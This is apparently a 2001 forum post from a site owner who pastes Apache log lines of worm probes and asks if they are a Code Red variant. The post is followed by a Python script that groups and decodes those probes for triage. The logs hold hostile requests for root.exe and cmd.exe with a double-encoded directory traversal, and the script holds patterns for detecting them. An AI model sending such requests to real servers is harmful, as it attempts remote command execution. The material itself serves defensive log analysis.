I got these in my apache logs:
209.67.254.107 - - [18/Sep/2001:21:26:07 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
209.67.254.107 - - [18/Sep/2001:21:26:08 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
209.67.254.107 - - [18/Sep/2001:21:26:18 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
210.118.61.41 - - [18/Sep/2001:22:54:35 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
210.118.61.41 - - [18/Sep/2001:22:55:26 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
198.147.38.145 - - [18/Sep/2001:23:03:19 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
198.147.38.145 - - [18/Sep/2001:23:03:43 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
165.189.168.140 - - [19/Sep/2001:00:14:39 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
165.246.31.164 - - [19/Sep/2001:00:33:40 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
165.246.31.164 - - [19/Sep/2001:00:33:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
165.246.31.164 - - [19/Sep/2001:00:33:41 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
165.246.31.164 - - [19/Sep/2001:00:33:44 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.246.31.164 - - [19/Sep/2001:00:33:46 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
165.246.31.164 - - [19/Sep/2001:00:33:48 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.246.31.164 - - [19/Sep/2001:00:33:49 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.246.31.164 - - [19/Sep/2001:00:33:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

It started just yesterday, Sept. 18, 2001, and
continues to do so till now. The source IP address varies but with the same
activity.

Is this a variant of Code Red? Is this another
threat? What should be done?
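
A log triage sketch for the probes quoted in the post above, added here as an example and not part of the original message. It groups requests for root.exe and cmd.exe by source address, decodes the double-encoded %255c, and lists any probe that did not return 404; the function names and the 192.0.2.10 line are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')
# Windows command interpreters requested in the post's log lines
SHELL = re.compile(r'/(cmd|root)\.exe$', re.I)

def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so double encoding (%255c -> %5c -> backslash) is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def triage(lines):
    """Return {source_ip: {"probes", "traversal", "non_404"}} for shell probes only."""
    report = defaultdict(lambda: {"probes": 0, "traversal": 0, "non_404": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a common-log-format line
        host, _when, _method, target, status, _size = m.groups()
        # Drop the query string, decode, and normalise backslashes to slashes
        path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
        if not SHELL.search(path):
            continue
        entry = report[host]
        entry["probes"] += 1
        if "../" in path:
            entry["traversal"] += 1
        if status != "404":
            entry["non_404"].append((target, status))  # needs a closer look
    return dict(report)

# First three lines are copied from the post; the last one is constructed.
SAMPLE = [
    '209.67.254.107 - - [18/Sep/2001:21:26:07 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288',
    '165.246.31.164 - - [19/Sep/2001:00:33:49 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296',
    '165.246.31.164 - - [19/Sep/2001:00:33:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    '192.0.2.10 - - [19/Sep/2001:00:40:00 +0800] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE).items()):
        print(host, info)
```

An empty non_404 list for every source means each probe was answered with 404, as in all the lines quoted in the post.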
